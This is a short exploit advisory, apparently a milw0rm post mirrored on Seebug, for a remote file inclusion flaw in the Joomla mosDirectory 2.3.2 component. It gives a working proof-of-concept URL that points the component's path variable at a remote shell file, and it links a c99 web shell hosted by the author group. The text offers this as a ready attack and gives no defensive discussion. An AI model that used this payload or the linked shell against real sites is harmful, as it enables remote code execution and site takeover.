--==+=================== Electronic Security Team (www.Yee7.com) =================+==-- --==+ Joomla Component mosDirectory 2.3.2 Remote File Inclusion +==-- --==+=============================================================================+==-- Software: Joomla Component mosDirectory 2.3.2 exploit: Remote File Inclusion [High Risk] By: ShockShadow - Electronic Security Team (www.Yee7.com) Home: www.Yee7.com Download: http://www.box.net/shared/kdp2h6dbe1 txtShell: http://yee7.com/shells/c99.txt ############################## ============== Dork: priv8 ;) PoC: http://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt? ############################### by: ShockShadow Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye AND ALL Yee7.com members # milw0rm.com [2007-12-24]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论